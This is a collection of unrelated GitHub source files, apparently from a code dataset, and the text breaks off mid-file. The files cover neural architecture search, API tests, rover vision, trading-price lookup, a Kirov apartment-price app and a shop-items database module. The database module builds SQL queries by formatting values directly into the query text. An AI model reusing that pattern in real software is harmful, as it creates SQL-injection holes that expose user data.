super().__init__(learn)\n self.wdecay = wdecay\n self.search_dat = search_dat\n self.len_sd = len(search_dat)\n self.cnt = 0\n self.epsilon = 0.\n self.arch_opt = torch.optim.Adam([self.learn.model.rnn.arch_p], \n lr=arch_lr, weight_decay=arch_wdecay)\n self.par = self.learn.model.parameters\n \n def clip_norm(self, inp, clip=0.25):\n total_norm = 0\n for g in inp:\n param_norm = g.norm(2)\n total_norm += param_norm ** 2\n total_norm = total_norm ** 0.5\n clip_coef = clip/ (total_norm + 1e-6)\n if clip_coef < 1:\n for g in inp:\n g.mul_(clip_coef) \n return clip_coef\n \n def on_batch_begin(self, last_input, last_target, **kwargs):\n if self.learn.model.training:\n original_hid = dc(self.learn.model.hid.detach())\n original_model_dict = dc(self.learn.model.state_dict())\n\n loss = self._loss(last_input, last_target)\n unrolled_grads = torch.autograd.grad(loss, self.par())\n \n clip_coef = self.clip_norm(unrolled_grads)\n \n with torch.no_grad():\n for p, v in zip(self.par(), unrolled_grads):\n v.add_(self.wdecay, p) \n p.sub_(self.learn.opt.lr, v)\n \n if self.cnt >= self.len_sd: self.cnt = 0\n x_search, y_search = self.search_dat[self.cnt]\n self.cnt += 1\n \n self.learn.model.hid = dc(original_hid)\n loss = self._loss(x_search, y_search, hid_search=True)\n loss.backward()\n dalpha = dc(self.learn.model.rnn.arch_p.grad) # first part of equation 6\n w_prime_grad = dc([v.grad for v in self.par()]) # save for w+, w-\n _ = self.clip_norm(w_prime_grad)\n\n self.learn.opt.zero_grad()\n self.arch_opt.zero_grad()\n self.epsilon = 1e-2 / torch.cat([x.view(-1) for x in w_prime_grad]).norm()\n self.learn.model.load_state_dict(original_model_dict)\n\n implicit_grads = self.impl(w_prime_grad, original_hid, last_input, last_target)\n self.learn.model.rnn.arch_p.grad = dalpha - self.learn.opt.lr * clip_coef * implicit_grads\n \n self.arch_opt.step()\n self.arch_opt.zero_grad()\n self.learn.opt.zero_grad()\n self.learn.model.hid = dc(original_hid) \n \n return \n \n def impl(self, w_prime_grad, original_hid, last_input, last_target):\n with torch.no_grad():\n for p, v in zip(self.par(), w_prime_grad):\n p.add_(self.epsilon, v) # w+\n\n self.learn.model.hid = dc(original_hid)\n loss = self._loss(last_input, last_target)\n w_plus_grad = torch.autograd.grad(loss, self.learn.model.rnn.arch_p)[0]\n\n with torch.no_grad(): \n for p, v in zip(self.par(), w_prime_grad):\n p.sub_(2*self.epsilon, v) # w-\n\n self.learn.model.hid = dc(original_hid) \n loss = self._loss(last_input, last_target)\n w_minus_grad = torch.autograd.grad(loss, self.learn.model.rnn.arch_p)[0]\n\n with torch.no_grad():\n for p, v in zip(self.par(), w_prime_grad):\n p.add_(self.epsilon, v) # revert back to original\n\n implicit_grads = (w_plus_grad - w_minus_grad)/(2*self.epsilon)\n return implicit_grads\n \n def _loss(self, inp, target, hid_search=False):\n return self.learn.loss_func(self.learn.model(inp, \n details = False, \n hid_search=hid_search), target)\n \nclass PrintGenotype(LearnerCallback):\n def on_epoch_end(self, **kwargs):\n print(self.learn.model.genotype_parse())\n return","repo_name":"amirreza-m95/Deep-Playground","sub_path":"fastai_darts_rnn/train_search.py","file_name":"train_search.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"18457747331","text":"\nimport pytest\nimport logging as logger\nfrom apiautotest.src.Utilities.requestUtilities import RequestUtility\nfrom apiautotest.src.dao.products_dao import Products_DAO\nfrom apiautotest.src.Helpers.ProductHelpers import ProductHelpers\n\npytestmark = [pytest.mark.products, pytest.mark.smoke]\n\n@pytest.mark.tcid24\n@pytest.mark.smoke\ndef test_get_all_productss():\n req_helper = RequestUtility()\n rs_api = req_helper.get('products')\n assert rs_api, f\"Response of list of all products are empty\"\n\n@pytest.mark.demo\n@pytest.mark.smoke\ndef test_get_products_by_id():\n\n # Get a product from DB\n rand_prod= Products_DAO().get_rand_prod_from_db(1)\n rand_prod_id= rand_prod[0]['ID']\n rand_prod_tit= rand_prod[0]['post_title']\n\n # Make the call\n prod_help =ProductHelpers()\n rs_api= prod_help.get_prod_by_id(rand_prod_id)\n rs_api= rs_api['name']\n\n # Verify the response\n assert rand_prod_tit==rs_api, f\"Get Product by id returned wrong product. ID: {rand_prod_id}\" \\\n f\"DB name: {rand_prod_tit}, API name: {rs_api}\"\n","repo_name":"maazahmedks/Backend-API-Automation-using-Python","sub_path":"apiautotest/tests/Products/test_get_products_smoke.py","file_name":"test_get_products_smoke.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"3033074903","text":"import numpy as np\nimport cv2\nfrom supporting_functions import wrap_angle_180\n\n\n# Identify pixels above the threshold\n# Threshold of RGB > 160 does a nice job of identifying ground pixels only\ndef color_thresh(img, rgb_thresh=(160, 160, 160)):\n # Create an array of zeros same xy size as img, but single channel\n color_select = np.zeros_like(img[:,:,0])\n # Require that each pixel be above all three threshold values in RGB\n # above_thresh will now contain a boolean array with \"True\"\n # where threshold was met\n above_thresh = (img[:,:,0] > rgb_thresh[0]) \\\n & (img[:,:,1] > rgb_thresh[1]) \\\n & (img[:,:,2] > rgb_thresh[2])\n # Index the array of zeros with the boolean array and set to 1\n color_select[above_thresh] = 1\n # Return the binary image\n return color_select\n\ndef obstacle_thresh(img, mask, rgb_thresh=(160, 160, 160)):\n # Create an array of ones same xy size as img, but single channel\n color_unselect = np.ones_like(img[:,:,0])\n # Require that each pixel be above all three threshold values in RGB\n # above_thresh will now contain a boolean array with \"False\"\n # where threshold was met\n above_thresh = (img[:,:,0] > rgb_thresh[0]) \\\n\t\t\t\t& (img[:,:,1] > rgb_thresh[1]) \\\n\t\t\t\t& (img[:,:,2] > rgb_thresh[2])\n # Index the array of ones with the boolean array and set to 0\n color_unselect[above_thresh] = 0\n # Return the binary image\n obstacle_area = np.float32(color_unselect*mask)\n return obstacle_area\n\ndef rocks_thresh(img):\n lower_yellow = np.array([19,100,100])\n upper_yellow = np.array([29,255,255])\n \n hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n mask = cv2.inRange(hsv, lower_yellow, upper_yellow)\n rocks_select = cv2.bitwise_and(img,img, mask= mask)\n \n rocks_select_bin = color_thresh(rocks_select, rgb_thresh=(5, 5, 5))\n \n return rocks_select_bin\n\n# Define a function to convert from image coords to rover coords\ndef rover_coords(binary_img):\n # Identify nonzero pixels\n ypos, xpos = binary_img.nonzero()\n # Calculate pixel positions with reference to the rover position being at the \n # center bottom of the image. \n x_pixel = -(ypos - binary_img.shape[0]).astype(np.float)\n y_pixel = -(xpos - binary_img.shape[1]/2 ).astype(np.float)\n return x_pixel, y_pixel\n\n\n# Define a function to convert to radial coords in rover space\ndef to_polar_coords(x_pixel, y_pixel):\n # Convert (x_pixel, y_pixel) to (distance, angle) \n # in polar coordinates in rover space\n # Calculate distance to each pixel\n dist = np.sqrt(x_pixel**2 + y_pixel**2)\n # Calculate angle away from vertical for each pixel\n angles = np.arctan2(y_pixel, x_pixel)\n return dist, angles\n\n# Define a function to map rover space pixels to world space\ndef rotate_pix(xpix, ypix, yaw):\n # Convert yaw to radians\n yaw_rad = yaw * np.pi / 180\n xpix_rotated = (xpix * np.cos(yaw_rad)) - (ypix * np.sin(yaw_rad))\n \n ypix_rotated = (xpix * np.sin(yaw_rad)) + (ypix * np.cos(yaw_rad))\n # Return the result \n return xpix_rotated, ypix_rotated\n\ndef translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale): \n # Apply a scaling and a translation\n xpix_translated = (xpix_rot / scale) + xpos\n ypix_translated = (ypix_rot / scale) + ypos\n # Return the result \n return xpix_translated, ypix_translated\n\n\n# Define a function to apply rotation and translation (and clipping)\n# Once you define the two functions above this function should work\ndef pix_to_world(xpix, ypix, xpos, ypos, yaw, world_size, scale):\n # Apply rotation\n xpix_rot, ypix_rot = rotate_pix(xpix, ypix, yaw)\n # Apply translation\n xpix_tran, ypix_tran = translate_pix(xpix_rot, ypix_rot, xpos, ypos, scale)\n # Perform rotation, translation and clipping all at once\n x_pix_world = np.clip(np.int_(xpix_tran), 0, world_size - 1)\n y_pix_world = np.clip(np.int_(ypix_tran), 0, world_size - 1)\n # Return the result\n return x_pix_world, y_pix_world\n\n# Define a function to perform a perspective transform\ndef perspect_transform(img, src, dst):\n \n M = cv2.getPerspectiveTransform(src, dst)\n warped = cv2.warpPerspective(img, M, (img.shape[1], img.shape[0]))# keep same size as input image\n mask = cv2.warpPerspective(np.ones_like(img[:,:,0]), M, (img.shape[1], img.shape[0]))\n return warped, mask\n\n# Crop x and y pixel values to improve fidelity\ndef crop_xy(xpix, ypix, crop_value):\n ypix_crop = ypix[xpix Settings -> Project interpreter -> Install -> python-bittrex\n\nfrom bittrex.bittrex import Bittrex\n\nmy_bittrex = Bittrex('my_api_key', 'my_api_secret')\n\nbsv_price = my_bittrex.get_market_history('USDT-BSV')\nprint(bsv_price['result'][0]['Price'])","repo_name":"konraddylewski/python_bittrex","sub_path":"price.py","file_name":"price.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38266619499","text":"from helpers import LuigiTestCase, temporary_unloaded_module\n\nimport luigi\nimport luigi.interface\n\nCONTENTS = b'''\nimport luigi\n\nclass FooTask(luigi.Task):\n x = luigi.IntParameter()\n\n def run(self):\n luigi._testing_glob_var = self.x\n'''\n\n\nclass CmdlineTest(LuigiTestCase):\n\n def test_dynamic_loading(self):\n with temporary_unloaded_module(CONTENTS) as temp_module_name:\n luigi.interface.run(['--module', temp_module_name, 'FooTask', '--x', '123', '--local-scheduler', '--no-lock'])\n self.assertEqual(luigi._testing_glob_var, 123)\n","repo_name":"spotify/luigi","sub_path":"test/dynamic_import_test.py","file_name":"dynamic_import_test.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":16912,"dataset":"github-code","pt":"2"} +{"seq_id":"11281064227","text":"# ABC094c\nimport sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(10**6)\n\nn = int(input())\nx = list(map(int, input().split()))\nfor i in range(n):\n x[i] = (x[i], i)\nx.sort()\n\nans = [-1]*n\n\nind = n//2\nfor i in range(n):\n if i <= n//2-1:\n ans[x[i][1]] = x[n//2][0]\n else:\n ans[x[i][1]] = x[n//2-1][0]\nprint(*ans, sep='\\n')\n","repo_name":"yuto-moriizumi/AtCoder","sub_path":"ABC094/ABC094c.py","file_name":"ABC094c.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70228856688","text":"#!/usr/bin/env python\n\n__author__ = 'Alex Gomes'\n\nimport alxlib.data.io\nimport logging, os, sys, subprocess\n\n\nclass Save:\n \"\"\"\n\n \"\"\"\n io = None\n\n def __init__(self):\n try:\n Save.io = alxlib.data.io.IO()\n path = Save.io.data_check()\n sys.path.append(path)\n logging.debug(\"path: {0}\".format(path))\n\n except:\n raise ()\n\n # Save\n def set_cmd(self, name, cmd):\n logging.debug(\"{0}->set_cmd(name:{1}, cmd:{2})\".format(os.path.abspath(__file__), name, cmd))\n\n try:\n import my_data\n\n my_data.alx_save[name.lower()] = cmd\n\n if name.lower() is not \"last\":\n my_data.alx_save[\"last\"] = cmd\n\n Save.io.export_data(my_data.alx_data, my_data.alx_save)\n except:\n raise ()\n\n def get_cmd(self, name):\n try:\n import my_data\n\n return my_data.alx_save.get(name, None)\n except:\n return None\n\n return None\n\n # alx_data\n def set_data(self, name, value):\n try:\n import my_data\n\n my_data.alx_data[name.lower()] = value\n\n Save.io.export_data(my_data.alx_data, my_data.alx_save)\n except:\n raise ()\n\n def get_data(self, name):\n try:\n import my_data\n\n return my_data.alx_data.get(name, None)\n except:\n return None\n\n return None\n\n\n def get_all(self):\n try:\n import my_data, copy\n\n return copy.deepcopy(my_data.alx_save)\n except:\n return None\n\n return None\n\n #Run\n def run_cmd(self, cmd, verbose):\n try:\n subprocess.call(cmd, shell=True)\n if verbose == True:\n print(cmd)\n except:\n raise ()\n\n #List\n def list_cmd(self, name, msg):\n\n try:\n cmd = self.get_cmd(name)\n if cmd is not None:\n print(cmd)\n else:\n print(msg)\n except:\n raise ()\n\n def list_all(self, msg):\n try:\n alx_save = self.get_all()\n if alx_save is not None:\n print(\" {0:10} {1}\".format(\"name:\", \"command\"))\n for key, value in alx_save.items():\n print(\" {0:10} {1}\".format(key + \":\", value))\n else:\n print(msg)\n except Exception as e:\n raise (e)\n\n #Flush\n def flush_cmd(self, name):\n try:\n import my_data\n\n my_data.alx_save.pop(name, None)\n Save.io.export_data(my_data.alx_save)\n except:\n raise ()\n\n def flush_all(self):\n try:\n Save.io.export_data({})\n except:\n raise ()\n\n","repo_name":"gomes-/alx","sub_path":"alxlib/save.py","file_name":"save.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73454085485","text":"def find_rec(n, m):\n sum = 0\n for i in range(n):\n for j in range(m):\n sum += (n - i) * (m - j)\n return sum\n\n\nmin = 10000000\nstandard = 2000000\nsize = 0\n\nfor i in range(2001):\n print(i)\n for j in range(2001):\n v = find_rec(i, j)\n if v > standard:\n diff = v - standard\n else:\n diff = standard - v\n if diff < min:\n min = diff\n size = i * j\n if v > standard:\n break\n\nprint(i, j, size, min)","repo_name":"crapas/ep","sub_path":"061_090/085/85.py","file_name":"85.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"6896557907","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup\nimport os, io\n\nfrom HtmlDiagnose.HtmlDiagnose import __version__, __description__\n\nhere = os.path.abspath(os.path.dirname(__file__))\nREADME = io.open(os.path.join(here, 'README.md'), encoding='UTF-8').read()\nCHANGES = io.open(os.path.join(here, 'CHANGES.md'), encoding='UTF-8').read()\nsetup(name='HtmlDiagnose',\n version=__version__,\n description=__description__,\n long_description=README + '\\n\\n\\n' + CHANGES,\n long_description_content_type=\"text/markdown\",\n url='https://github.com/sintrb/HtmlDiagnose',\n keywords=('HtmlDiagnose', 'HTML', 'Web'),\n author='sintrb',\n author_email='sintrb@gmail.com',\n license='Apache',\n packages=['HtmlDiagnose'],\n scripts=[],\n install_requires=['requests'],\n include_package_data=True,\n zip_safe=False)\n","repo_name":"sintrb/HtmlDiagnose","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22579801288","text":"from easydict import EasyDict\nfrom horizon_nn.data.data_loader import *\nfrom horizon_nn.data.transformer import *\nfrom loader import CifarLoader\n\n\ndef data_transformer():\n # means = np.array([0.5, 0.5, 0.5], dtype=np.float32)\n transformers = [\n # ScaleTransformer( 1/ 255),\n # MeanTransformer(means),\n # ScaleTransformer(2),\n ColorConvertTransformer('RGB', 'GRAY', 'CHW'),\n ]\n return transformers\n\n\ndef CifarDataLoader(transformers,\n cifar_path,\n include_label=False,\n max_len=0,\n batch_size=1):\n loader = CifarLoader(\n cifar_path, include_label=include_label, max_len=max_len)\n return DataLoader(loader, transformers=transformers, batch_size=batch_size)\n\n\ndef dataset_loader(\n cifar_path=None,\n max_len=10000,\n include_label=False,\n batch_size=1,\n):\n transformers = data_transformer()\n loader = CifarDataLoader(\n transformers,\n cifar_path=cifar_path,\n batch_size=batch_size,\n include_label=include_label,\n max_len=max_len)\n return loader\n","repo_name":"sbbug/x3_chain","sub_path":"02_runtime_src/4_simple_example/tools/cifar10_tools/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"3001919325","text":"#! /usr/bin/env python3\n\nfrom requests_futures.sessions import FuturesSession\nfrom html.parser import HTMLParser\nimport re\nimport json\nimport sys\nimport git\nimport os\n\n\nclass MLStripper(HTMLParser):\n def __init__(self):\n super().__init__()\n self.reset()\n self.fed = []\n def handle_data(self, d):\n self.fed.append(d)\n def get_data(self):\n return ''.join(self.fed)\n\n\ndef strip_tags(html):\n s = MLStripper()\n s.feed(html)\n return s.get_data()\n\n\ndef get_quotes(num=10):\n futures = []\n url = \"http://www.quotedb.com/quote/quote.php?action=random_quote\"\n session = FuturesSession()\n for i in range(1, num+1):\n futures.append(session.get(url))\n results = []\n for f in futures:\n res = f.result()\n results.append(res.content)\n return results\n\n\ndef extract_quote(text):\n text = text.decode(errors='ignore')\n matches = re.findall(r'document.write\\(\\'(.*)\\'\\)', str(text))\n if not matches or len(matches) != 2:\n print(\"Error: matches = \", matches)\n return None\n quote = strip_tags(matches[0])\n author = re.search(r'More quotes from (.*)', strip_tags(matches[1]))\n if author:\n author = author.group(1)\n return (quote, author)\n\n\ndef write_to_json_file(tups, filename=\"quotes.json\"):\n data = []\n for quote, author in tups:\n data.append({'quote': quote, 'author': author})\n json_str = json.dumps(data)\n with open(filename, 'w') as f:\n f.write(json_str)\n return filename\n\ndef construct_quotes():\n if len(sys.argv) == 2:\n num = int(sys.argv[1])\n else:\n num = 1\n results = get_quotes(num=num)\n tups = []\n for r in results:\n tup = extract_quote(r)\n if tup is not None:\n try:\n q = str(tup[0])\n a = str(tup[1])\n tups.append(tup)\n except Exception as e:\n pass\n return tups\n\ndef main():\n print(\"Gitting Gud\")\n repo = git.Repo(os.getcwd())\n assert not repo.bare\n\n if repo.remotes.origin:\n origin = repo.remotes.origin\n else:\n print(\"Setting up remote.\")\n origin = repo.create_remote('origin', repo.remotes.origin.url)\n assert origin.exists()\n assert origin == repo.remotes.origin == repo.remotes['origin']\n\n print(\"Fetching and pulling.\")\n origin.fetch()\n origin.pull()\n\n diffs = repo.index.diff(None)\n deletions = []\n if not diffs and len(repo.untracked_files) == 0:\n exit(\"No changes to add... git gud man.\")\n\n if len(diffs) > 0:\n print(\"Changed files:\")\n for diff_added in diffs:\n if diff_added.b_mode:\n print(f'\\t{diff_added.a_path}')\n repo.index.add([diff_added.a_path])\n else:\n deletions.append(diff_added)\n\n if len(deletions) > 0:\n print(\"Deleted files:\")\n for diff_removed in deletions:\n if not diff_added.b_mode:\n print(f'\\t{diff_removed.a_path}')\n repo.index.remove([diff_added.a_path])\n\n if len(repo.untracked_files) > 0:\n print(\"New files:\")\n for file in repo.untracked_files:\n print(f'\\t{file}')\n repo.index.add([file])\n\n print(\"Committing\")\n quotes = construct_quotes()\n commit_message = f'{quotes[0][0]} - {quotes[0][1]}'\n repo.index.commit(commit_message)\n\n print(\"Pushing\")\n origin.push()\n\n print(\"Gotten Gud\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"Qvdpost/gitgud","sub_path":"gitgud.py","file_name":"gitgud.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40184802014","text":"filename = input( \"Please type in the filename: \" )\nexerciseFile = open( filename)\n\nexerciseSoFar = 0\nnumberOfValuesInFile = int( exerciseFile.readline() )\n\nfor dayNumber in range( numberOfValuesInFile ):\n todaysExercise = int( exerciseFile.readline() )\n exerciseSoFar = exerciseSoFar + todaysExercise\n\nexerciseHours = exerciseSoFar // 60\nexerciseMinutes = exerciseSoFar % 60\n\nprint( \"You have exercised\", exerciseHours, \"hours and\", exerciseMinutes, \"minutes this month!\" )\n","repo_name":"markstrathie/2021_CS_1CT","sub_path":"exerciseProgram.py","file_name":"exerciseProgram.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"1164237758","text":"import streamlit as st\nimport numpy as np\nimport pickle\nimport catboost\nfrom catboost import CatBoostRegressor\nimport datetime\nfrom streamlit_folium import folium_static\nimport folium\n\nmodel = pickle.load(open(\"cat_model.pkl\", \"rb\"))\nnow = datetime.datetime.now()\n\n#streamlit run estimate.py\n\n#Метки\nso = 0 \nsk = 0 \nsj = 0 \ndol = 0 \nsh = 0\n\n#Заголовок\nst.markdown('

    Оценка стоимости квартир в городе КировеВведите значение общей площади квартиры! 317)):\n so = 1 #метка\n st.write('

    Общая площадь квартиры должна находиться в диапазоне от 12 кв.м до 317 кв.м!Введите значение площади кухни квартиры! 61)):\n sk = 1 #метка\n st.write('

    Площадь кухни должна находиться в диапазоне от 2 кв.м до 61 кв.м!Введите значение жилой площади квартиры! 90)):\n sj = 1 #метка\n st.write('

    Жилая площадь должна находиться в диапазоне от 4 кв.м до 90 кв.м!Введите значение долготы, например, - 49,628919!Значение долготы должно содержать не менее 8 символов, например, - 49,628919!Введите значение долготы, например, - 58,606375!Значение долготы должно содержать не менее 8 символов, например, - 58,606375!Поля выше заполнены не корректно! 'prize'\n \"\"\".format(item_name)\n return fetch_items(select_command(sql_query))\n\n\ndef add_item_to_shop(item):\n sql_query = \"\"\"\n INSERT INTO Items (shop_name, name, category, keyWords, price, quantity, kind, url , item_rating,\n sum_of_rankings, num_of_reviews) \n VALUES ('{}', '{}', '{}', '{}', {}, {}, '{}', '{}', '{}', '{}', '{}');\n \"\"\".format(item.shop_name,\n item.name, item.category,\n item.keyWords,\n item.price, item.quantity, item.kind, item.url, 5, 0, 0)\n return commit_command(sql_query)\n\n\ndef add_item_to_shop_and_return_id(item):\n sql_query = \"\"\"\n INSERT INTO Items (shop_name, name, category, keyWords, price, quantity, kind, url , item_rating,\n sum_of_rankings, num_of_reviews) \n VALUES ('{}', '{}', '{}', '{}', {}, {}, '{}', '{}', '{}', '{}', '{}');\n \"\"\".format(item.shop_name,\n item.name, item.category,\n item.keyWords,\n item.price, item.quantity, item.kind, item.url, 5, 0, 0)\n try:\n conn = get_conn()\n c = conn.cursor()\n c.execute(sql_query)\n conn.commit()\n to_return = c.lastrowid\n conn.close()\n return to_return\n except Error as e:\n return False\n\n\ndef remove_item_from_shop(item_id):\n sql_query = \"\"\"\n DELETE FROM Items\n WHERE id = '{}'\n \"\"\".format(item_id)\n return commit_command(sql_query)\n\n\ndef search_item_in_shop(shop_name, item_name):\n sql_query = \"\"\"\n SELECT *\n FROM Items,Shops\n WHERE Items.name = '{}' AND Shops.name = '{}' AND Items.shop_name = '{}' AND Items.kind <> 'prize'\n \"\"\".format(item_name, shop_name, shop_name)\n return fetch_item(select_command(sql_query))\n\n\ndef search_items_in_shop(shop_name):\n sql_query = \"\"\"\n SELECT *\n FROM Items,Shops\n WHERE Shops.name = Items.shop_name AND Items.shop_name = '{}' AND Items.kind <> 'prize'\n \"\"\".format(shop_name)\n return fetch_items(select_command(sql_query))\n\n\ndef search_items_by_category(item_category):\n sql_query = \"\"\"\n SELECT *\n FROM Items,Shops\n WHERE category = '{}' AND Shops.status = 'Active' AND Shops.name = Items.shop_name AND Items.kind <> 'prize'\n \"\"\".format(item_category)\n return fetch_items(select_command(sql_query))\n\n\ndef search_items_by_keywords(item_keyword):\n sql_query = \"\"\"\n SELECT *\n FROM Items,Shops\n WHERE keyWords = '{}' AND Shops.status = 'Active' AND Shops.name = Items.shop_name AND Items.kind <> 'prize'\n \"\"\".format(item_keyword)\n return fetch_items(select_command(sql_query))\n\n\ndef update_item(item_id, field_name, new_value):\n sql = \"\"\"\n UPDATE Items\n SET {} = '{}'\n WHERE id = '{}'\n \"\"\".format(field_name, new_value, item_id)\n return commit_command(sql)\n\n\ndef get_shop_items(shop_name):\n sql = \"\"\"\n SELECT * FROM Items WHERE shop_name='{}'\n \"\"\".format(shop_name)\n return fetch_items(select_command(sql))\n\n\ndef get_item_by_code(code):\n sql_query = \"\"\"\n SELECT Items.*\n FROM Items,InvisibleDiscounts\n WHERE Items.id = InvisibleDiscounts.item_id AND InvisibleDiscounts.code = '{}'\n \"\"\".format(code)\n return fetch_item(select_command(sql_query))\n\n\ndef get_top_five_ranked_items():\n sql = \"\"\"\n SELECT Items.* FROM Items,Shops \n WHERE Items.kind <> 'prize' AND Items.shop_name = Shops.name AND Shops.status = 'Active'\n ORDER BY item_rating DESC limit 5\n \"\"\"\n return fetch_items(select_command(sql))\n\n\ndef get_id_by_name(item_name):\n sql = \"\"\"\n SELECT id FROM Items\n WHERE name = '{}'\n \"\"\".format(item_name)\n return select_command(sql)[0][0]\n","repo_name":"omriattiya/uTrade","sub_path":"DatabaseLayer/Items.py","file_name":"Items.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70239465327","text":"# for Coverage\nfrom mock import patch\n\n\nclass TestCommodities:\n def test_all(self):\n from pyEX import Client\n c = Client('test')\n with patch('pyEX.common._getJsonIEXCloud'), \\\n patch('pickle.dump'):\n c.wti()\n c.brent()\n c.natgas()\n c.heatoil()\n c.jet()\n c.diesel()\n c.gasreg()\n c.gasmid()\n c.gasprm()\n c.propane()\n","repo_name":"timkpaine/pyEX-zipline","sub_path":"pyEX/tests/test_commodities.py","file_name":"test_commodities.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"2"} +{"seq_id":"33114037483","text":"import RPi.GPIO as GPIO\nimport time\n\n# Set up the GPIO pin for the LED\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(24, GPIO.OUT)\n\n# Set the LED to blink at a rate of 1 Hz (once per second)\nblink_rate = 1\n\ntry:\n while True:\n # Turn on the LED\n GPIO.output(24, GPIO.HIGH)\n time.sleep(blink_rate / 2)\n\n # Turn off the LED\n GPIO.output(24, GPIO.LOW)\n time.sleep(blink_rate / 2)\n\nexcept KeyboardInterrupt:\n # Clean up the GPIO pin before exiting\n GPIO.cleanup()\n","repo_name":"Mahanth-Maha/IntruderAlertSystem","sub_path":"ID_V2_pi/blink.py","file_name":"blink.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"39003410587","text":"\nfrom flask.json import dumps\n\nimport requests\nfrom requests import HTTPError\n\nfrom mockernaut.compat import urljoin\n\n\ndef join(*parts):\n base = ''\n\n return ''.join(map(lambda e: urljoin(base, '{0}'.format(e)), parts))\n\n\nclass Client(object):\n def __init__(self, base_url, api_path):\n self._base_url = base_url\n self._api_path = api_path\n\n def get(self, _id):\n response = requests.get(\n join(self._base_url, self._api_path, '{_id}'.format(_id=_id))\n )\n response.raise_for_status()\n\n return response.json()\n\n def list(self):\n response = requests.get(\n urljoin(self._base_url, self._api_path),\n )\n response.raise_for_status()\n\n return response.json()\n\n def create(self, rule):\n response = requests.post(\n join(self._base_url, self._api_path),\n data=dumps(rule)\n )\n response.raise_for_status()\n\n return response.json()\n\n def delete(self, _id):\n response = requests.delete(\n join(self._base_url, self._api_path, '{_id}'.format(_id=_id))\n )\n response.raise_for_status()\n\n return response.json()\n","repo_name":"marrrvin/mockernaut","sub_path":"mockernaut/client/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34119594451","text":"import contextlib\n\nfrom cupy.cuda import compiler\nfrom cupy.cuda import device\nfrom cupy.cuda import function\nfrom cupy.cuda import memory\nfrom cupy.cuda import profiler\nfrom cupy.cuda import stream\n\ncompile_with_cache = compiler.compile_with_cache\n\nDevice = device.Device\nget_cublas_handle = device.get_cublas_handle\nget_device_id = device.get_device_id\n\nalloc = memory.alloc\nMemory = memory.Memory\nMemoryPointer = memory.MemoryPointer\nMemoryPool = memory.MemoryPool\nset_allocator = memory.set_allocator\n\nFunction = function.Function\nModule = function.Module\n\nEvent = stream.Event\nStream = stream.Stream\nget_elapsed_time = stream.get_elapsed_time\n\n\n@contextlib.contextmanager\ndef profile():\n \"\"\"Enable CUDA profiling during with statement.\n\n This function enable profiling on entering with statement, and disable\n profiling on leaving the statement.\n\n >>> with cupy.cuda.profile():\n ... # do something you want to measure\n\n \"\"\"\n profiler.start()\n try:\n yield\n finally:\n profiler.stop()\n","repo_name":"germanRos/chainer-deconv","sub_path":"cupy/cuda/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"25569461726","text":"\"\"\"\nImage Captioning\n\n Input: image.\n Output: A sequence of words in a natural language, which hopefully describes the contents of the input Image.\n\n\"\"\"\n\nimport os\nimport sys\nimport json\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom glob import glob\nfrom IPython.display import display\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\nimport torchvision.transforms as transforms\nimport torchvision.models as models\n\nfrom utils import *\nfrom build_vocab import build_vocab\nfrom data_loader import get_loader\n\n# setup\nuse_gpu = torch.cuda.is_available()\n\ndef load_cnn_model(model_name, pretrained=True):\n \"Load and return a convolutional neural network.\"\n assert model_name in ['resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152']\n return models.__dict__[model_name](pretrained)\n\n\ndef load_image(image_path, transform=None):\n \"Load an image and perform given transformations.\"\n image = Image.open(image_path) \n if transform is not None:\n image = transform(image).unsqueeze(0)\n return image\n\n\"\"\"\nData\n\n https://cocodataset.org/#download\n More than 80k training images and 40k validation images.\n At leat 5 captions for every image.\n\"\"\"\n\ndataset = 